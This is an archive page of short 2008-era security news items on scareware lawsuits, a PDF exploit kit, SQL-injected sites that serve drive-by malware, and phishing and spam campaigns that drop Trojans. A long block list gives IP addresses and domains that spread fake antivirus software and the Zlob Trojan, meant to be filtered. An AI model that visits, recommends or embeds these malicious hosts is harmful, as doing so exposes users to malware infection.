CyberInsecure.com

Archive for the ‘Malware’ Category

Washington state’s top law enforcement official has filed suit against a man accused of bombarding end users with misleading messages designed to trick them into buying software to fix PC problems that don’t exist.

The complaint, filed in Washington state court by Attorney General Rob McKenna’s office, names James Reed McCreary IV of The Woodlands, Texas, and two of his companies, Branch Software and Alpha Red. They stand accused of pushing a software package called Registry Cleaner XP by sending end users messages falsely claiming their PCs have corrupted or damaged registry settings that must be repaired immediately. The software sells for $40.

In many cases, the warnings are delivered using Windows Messenger Service, a network administration utility for delivering system-wide messages to end users. The popup windows claim to be generated by the “Local System” and warn of a “critical error” related to the end user’s registry. The messages were directed to a wide swath of internet protocol addresses, and in many cases were sent over and over, causing hundreds of windows to open that the user has to close individually.

The prevalence of so-called scareware has reached epidemic proportions. Programs frequently mimic real security features within the Windows operating system to fool people into believing their PC has been infected with malware. In many cases, it’s just about impossible to remove the software once it’s been installed.

“Through alarmist language seemingly delivered by a trusted source, defendants misrepresent the extent to which installing the software is necessary for repair of the computer for proper operation,” the complaint argues. The error messages, which appear on machines free of any problems, “induces the consumers to purchase defendants’ product, which must be used in order to ‘repair’ the ‘errors.’”

Microsoft referred the case to McKenna’s office and has been helpful in assisting the AG’s consumer protection high-tech unit to enforce laws against scareware mongers. Over the past three years, Microsoft has brought 17 lawsuits under Washington’s Computer Spyware Act and the state’s attorney general has filed seven.

A number listed as belonging to McCreary had been disconnected. No one answered a phone listed in this WHOIS listing as belonging to Branch Software.

Discovery by Secure Computing’s anti-malware research labs shows that a new exploit pack exclusively targets PDF vulnerabilities, exposing Windows users to malicious hacker attacks. The Portable Document Format (PDF) is one of the file formats of choice commonly used today, since it’s widely deployed across different operating systems. On a down-side, this format has many known vulnerabilities which are exploited in the wild.

The toolkit targets only PDFs, no other exploits are used to leverage vulnerabilities. Typical functions like caching the already infected users are deployed by this toolkit on the sever-side. Whenever a malicious PDF exploit is successfully delivered, the victim’s IP address is remembered for a certain period of time. During this time the exploit is not delivered to that IP again, which is another burden for incident handling.

Other existing toolkits have also been enhanced with PDF exploits lately. For example, “El Fiesta” toolkit have also added exploits for the Portable Document Format. End users are usually very slow to apply software patches, giving the bad guys a huge opening for targeted, localized malware attacks.

Malware spreaders have put this kind of exploits to their arsenal of malicious weapons for a longer time already. The “Tibs” group of malware, for example, is known for planting malicious IFRAMEs onto infected legitimate web sites and having them refer back to their exploit servers. Dissecting the shellcode shows that the payload of the exploits tries to load more malware and the different number per exploit appears to be a kind of affiliation ID to keep some statistics and track their different malware campaigns.

Users can use the Secunia’s PSI (personal software inspector) to find older software versions. The discovery of this toolkit should be a very good reason to patch the Adobe Reader.

Sunbelt, a developer of protection software known for it’s Kerio firewall, has been publishing a list of domains which are involved in spreading of Zlob trojan and fake malware anti-virus known as Antivirus XP 2008 (and its clones). Domains from this list might infect visitors, considered malicious and should be added as untrusted into filters.

There is no full proof method to identify every website as malicious or trusted, as trusted sites often hacked or hijacked. The list from Sunbelt includes domains registered clearly for scams and malware distribution. The list is comprehensive and updated on a regular basis.

The list contains many cloned rogue security products, scam sites and Zlob Trojan distributing sites.

Here is the list, last updated for September 20:

(Never visit those sites, they might infect your system)

Zlob Trojan Distributing site: 77.91.231.201 Movsdlls. com
77.91.231.183 Mediamswares. com

Scam Internet Security Page: 91.203.92.11 Asafetysite. com

404ErrorpageScam: 91.203.92.12 Errordnsurl. com

Security Guide Scam Page: 91.203.92.11 Linksondesktop. com

Ad-Server-Gate Pages: 91.203.92.11 Gfbwd. com
91.203.92.11 Ogjtu.com

Security Center Scam Page: 91.203.92.12 Waysofsecurity. com

Scam Security Toolbar site: 91.203.92.12 Toolbarunit. com

IE AntiSpywareStore site: 92.62.101.83 Ieprogramming. com

Zlob Trojan Distributing site: 77.91.231.201 Movsdevices. com
77.91.231.183 Wmptools. com

Scam Internet Security Page: 91.203.92.12 Homesiteurls. com

404ErrorpageScam: 91.203.92.11 Urlsofdnserrors. com

Security Guide Scam Page: 91.203.92.11 Fastshortcuts. com

Ad-Server-Gate Pages: 91.203.92.12 Xbstw. com
91.203.92.12 Eufnt. com

Security Center Scam Page: 91.203.92.11 Protectnotice. com

Scam Security Toolbar site: 91.203.92.11 Securealertbar. com

IE AntiSpywareStore site: 92.62.101.84 Ierenewals. com

Antivirus 2009 Fake/Scanner page: 84.16.252.138 Vassariumpromo. com

AntiVirus Lab 2009 Home page: 66.232.113.62 Viruslabs2009. com

direct malware installation site: 91.203.93.37 Iwantfriday. com

77.91.231.183 Classicmediapl. com

Scam Internet Security Page: 91.203.92.11 Sweathomepage. com

404ErrorpageScam: 91.203.92.12 Amistypedurl. com

Security Guide Scam Page: 91.203.92.12 Linkfordesktop. com

Ad-Server-Gate Pages: 91.203.92.11 Yuiqd. com
91.203.92.11 Hfnvp. com

Protection Center Scam Page: 91.203.92.12 Observesecure. com

Scam Security Toolbar site: 91.203.92.12 Aglobaltoolbar. com

IE AntiSpywareStore site: 216.255.179.244 Enhancedie. com

Antivirus 2009 Fake/Scanner page: 78.159.118.168 Prtectionactivescan. com

77.91.231.201 Immediallc. com
77.91.231.183 Softlayerdll. com

Scam Internet Security Page: 85.255.116.210 Dailyhomesite. com

404ErrorpageScam: 85.255.116.214 Nowherepage. com

Security Guide Scam Page: 85.255.118.34 Firstaidclicks. com

Ad-Server-Gate Pages: 85.255.118.37 Oryfn. com
85.255.118.38 Eufks. com

Protection Center Scam Page: 85.255.118.34 Aprotectionhelp. com

Scam Security Toolbar site: 85.255.118.211 Safensecurebar. com

IE AntiSpywareStore site: 216.255.179.245 Ieextend. com

Windows Antivirus: 92.241.163.30 Windows-av. com

Micro Antivirus: 2009 91.208.0.223 Microantivirus2009. com

Antivirus Security: 78.159.114.116 Antivirussecurity-solution. com

77.91.231.201 Intervidd. com
77.91.231.183 Pwrware. com

92.62.101.55 Ms-avc. com MSX AV

Scam Internet Security Page: 85.255.116.212 Homepagetoday. com

404Errorpage Scam: 85.255.118.243 Brokenurls. com

Security Guide Scam Page: 85.255.118.210 Desklinks.com

Ad-Server-Gate Pages: 85.255.118.212 Rycsp. com
85.255.118.213 Cusln. com

Scam Security center site: 85.255.118.36 Pcsdefender. com

Scam Security Toolbar site: 85.255.118.35 Webprobar. com

IE toolbar redirect: 216.255.179.245 Ieextend. com

A clone of the Antispyware 2008 XP/WinSpywareProtect family:

85.255.119.14 scan.antispyware-free-scanner com
Not Active as-pro-xp-download com
78.157.142.79 files.as-pro-xp-download com
92.241.163.32 spypreventers com
77.244.220.134 online-security-systems com
77.244.220.134 xpprotector com
77.244.220.134 av-xp2008 net

New rogue clone of Antivirus XP 2008, XP Protector 2009 (Winifixer).

77.244.220.134 online-security-systems com
77.244.220.134 xpprotector com
77.244.220.134 av-xp2008 net

(Never visit those sites, they might infect your system)

We will update this list as it is updated on Sunbelt Blog.

The website for the Texas National Guard remained unreachable on Friday, two days after security researchers said it had been hacked by miscreants who were using it to install malware on visitors PCs. Some pages on the website were probably SQL injected.

On Wednesday, Roger Thompson, chief research officer of anti-virus provider AVG, reported that selected pages on the site were attempting to install a rootkit on machines that were not fully patched. The ruse starts by silently redirecting visitors to a site called add-block-plus.net, which in turn bounces visitors to several other sites.

The attack comes as the Texas National Guard responds to Hurricane Ike, which earlier this week ravaged the gulf coast of Texas. Someone answering the guard’s public affairs line said the person responsible for the website was busy with relief efforts.

Not only Texas has been hammered so hard by the hurricane, the guys that are probably helping out the most have been hacked in return. Now Texas National Guard needs to find how the Bad Guys got in, and then fix the flaw, which will most likely pop on other gov related websites. According to Sophos researchers, the Texas National Guard is only one of many sites to be hit in the attack. The malware residing on the site is detected as Mal/ObfJS-A.

MessageLabs intercepted a targeted, email-borne malware attack on US schools and government organizations starting in early September. The majority of attacks are located in New Mexico, Virginia, Illinois and Hawaii. The attack comprised more than 1000 emails from only 15 source IP addresses, most of which were located in the former Soviet Union on consumer-based address ranges signaling that the attacks are the result of a botnet that may be looking to expand.

Analysis reveals that dispersement lasted almost two days and used social engineering techniques to deliver the malware, Trojan-Spy.Win32.Zbot.ele, as both an executable email attachment and a link within an email, disguised as a Microsoft Windows Update. There were three similar attacks targeting US schools, businesses and state governments. According to MessageLabs, these attacks may be deploying the Antivirus XP 2008 malware.

The attackers are taking advantage of host already infected with malware and using them as stepping stones for launching the attacks. Eventually, U.S based infected hosts are used to launch targeted attacks against U.S schools and organizations.

Criminals are putting more efforts into the quality assurance of their campaigns by means of localizing the spam message to the native language of the receipts, known due to the segmented email database belonging to a particular sector that they’ve already purchased. However, in this particular targeted attack they seem to have underestimated the personalization of the emails, and despite the obvious segmentation of potential victims to spam, were taking advantage of average social engineering tactics more suitable for a large scale malware campaign.

The victim counts from these attacks is over 15,000 corporate users in 15 months. Victims include Fortune 500 companies, government agencies, financial institutions and legal firms. In these attacks, the goal is to gain access to corporate banking information, customer databases and other information to facilitate cyber crime. Two groups of attackers have carried out 95 percent of these attacks.

Spammers are constantly using simple social engineering tactics that scare people into opening malicious files. This is definitely not a first time and it seems this method is rather successful. TrendLabs reports a new form of spam email containing a malicious file attachment that have been spreading over the Internet. This time the subject is “Your internet access is going to get suspended”. The spam email claims to come from ICS Monitoring Team telling recipients that they have to stop their illegal downloading of copyrighted material or else their Internet access will be suspended.

The spam email claims that a report of the recipient’s activities for the past six months is in the attached zipped file. Apparently, instead of the said report, the zipped file contains a malicious executable file named user-EA49943X-activities.exe.

The malicious file is currently detected as TROJ_MEREDROP.GJ by TrendLabs. It drops two files, both GOLDUN variants. This Trojans are known information stealers that monitor the Internet browsing activities of affected users. In this particular case the cyber-criminals intend to steal credentials related to the online banking site www.e-gold.com.

This is not the first time malware authors have disguised themselves as the ‘Internet police’. Trend Micro researchers already found spam which also presented users with the same ISP Consorcium spill used in the spam.

Facebook’s security team has introduced a new security related warning feature that alerts users about potentially malicious third-party websites they are about to visit. Facebook is persistently under attacks from phishers and malware authors who look for creative ways to efficiently exploit Facebook’s huge users base.

New Facebook feature is adding a warning message to links it suspects of being spam or phishing. The message states: “You are about to leave Facebook to visit this address. For the safety and privacy of your Facebook account, remember to never enter your password unless you’re on the real Facebook web site”.

The new feature should slow down ongoing malicious campaigns and make the user think twice before clicking further. Just last August, several worms used Facebook to propagate and infect users. This security improvement arrives just in time, since Trend Micro recently stumbled upon another Facebook phishing site, one of few thousands, probably. The page looks very similar to the actual Facebook login page and asks users to log into their accounts by entering their email addresses and passwords. After providing the required information, users are led to the legitimate Facebook site, tricking them into thinking that their account information is still safe from malicious users, when in fact it was already stolen.

The theft happens when users enter their account credentials on the fake Facebook page. The details written on the fields are logged, and are in turn used by the people behind this operation for different purposes. Email accounts may be used in sending spam to one’s contacts, for example. Leading users to the actual Facebook page after they have entered their account information is a trick to prevent users from discovering the theft.

Facebook, with many other popular social networking sites, is being targeted for fraud purposes, in addition to different malware infection tactics. It would be even more secure if it could integrate freely available blacklists of malicious and phishing sites (such as Google’s Safe Browsing Diagnostic, SiteAdvisor, Phishtank) and implement some URL shortening that would highlight the original domain in order to expose a phishing email.

Malicious hackers have broken into several sections of BusinessWeek.com and as a result the content has been infected by Mal/Badsrc-C via SQL injection. The infected pages are related to to jobs and recruitment.

Currently hundreds of pages on BusinessWeek.com are being rigged with malicious JavaScript pointing to third-party servers. Visitors to the site execute the script, which attempts to launch drive-by malware downloads. Some malicious pages are successfully bypassing Firefox 3 blacklist-based filter.

According to data from the Google Safe Browsing API, BusinessWeek.com has been flagged as malicious for a while:

Of the 2157 pages we tested on the site over the past 90 days, 214 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 09/15/2008, and the last time suspicious content was found on this site was on 09/11/2008.

Malicious software includes 721 scripting exploit(s), 4 trojan(s), 3 exploit(s). Successful infection resulted in an average of 2 new processes on the target machine.

Malicious software is hosted on 90 domain(s), including adbtch.com, advabnr.com, bnsdrv.com.

11 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including advabnr.com, bnsdrv.com, cv2e.ru.

BusinessWeek.com joins high-profile targets such as Bank of India, China.com, and USA Today which were recently hit by similar SQL injections. According to expert estimates, at least 70 percent of all Web-based malware is now being hosted on legitimate Web sites.

As usual, we advise users to use Firefox, and Firefox users we advise to install NoScript addon which protects from JavaScript-injected infected websites (and from many other malicious elements).

SophosLabs has intercepted a widespread malicious spam campaign that claims there was a powerful explosion at a nuclear power station outside London two days ago. According to the email, the government have stopped the media reporting about the incident and prevented anyone affected by it contacting the outside world. Email attachment (called victims.zip) supposedly contains images of the devastation left by the explosion and pictures of victims’ bodies.

No such plant exists anywhere near London. The nearest is probably Dungeness B in south east Kent, some 77 miles (124km) by road from the capital. The attached zip file is contaminated with a Trojan horse, identified by net security firm Sophos as Troj/Agent-HQE. Once the malware is installed, hackers can use it to spy on the victim’s computer and steal information for financial gain.

The emails typically arrive with subject lines such as “Reply: A report on radiation contamination of Canada”, suggesting that a nuclear disaster has occurred and the UK and local authorities have succeeded in hushing it up.

“Rather than use a real life event, the hackers have turned to fictional explosions and conspiracy theories in the hope they will strike a nerve with potential victims who will then click on the attachment without a second thought,” commented Graham Cluley, senior technology consultant at Sophos.

All computer users need to show some common sense and delete these messages. Until everyone wakes up to these social engineering tactics, the cybercriminals will continue to use them. As always, it’s a good idea to ensure that your computer is defended with up-to-date anti-virus protection.

According to Chris Boyd, director of malware research at IM security firm Facetime, miscreants are using a fake Twitter profile in a bid to spread malware that harvests login credentials for Orkut. Updates to the fake Twitter profile are supposedly being followed by 17 punters, but they’re all fake.

The profile is designed to trick would-be marks into viewing a photo album on Orkut, which supposedly requires a Flash update to view. This bogus Flash update is contaminated by malware, specifically the OrkutTron Trojan.

OrkutTron performs a variety of malicious actions including an attempt to snaffle login credentials for Orkut, the Google-run social networking site that’s particularly big in Brazil. Fitting in with this theme, the fake Twitter profile is written in Portuguese.

Attacks targeting Orkut are relatively commonplace, but as Boyd notes, the use of Twitter represents an innovation in such hacking attacks.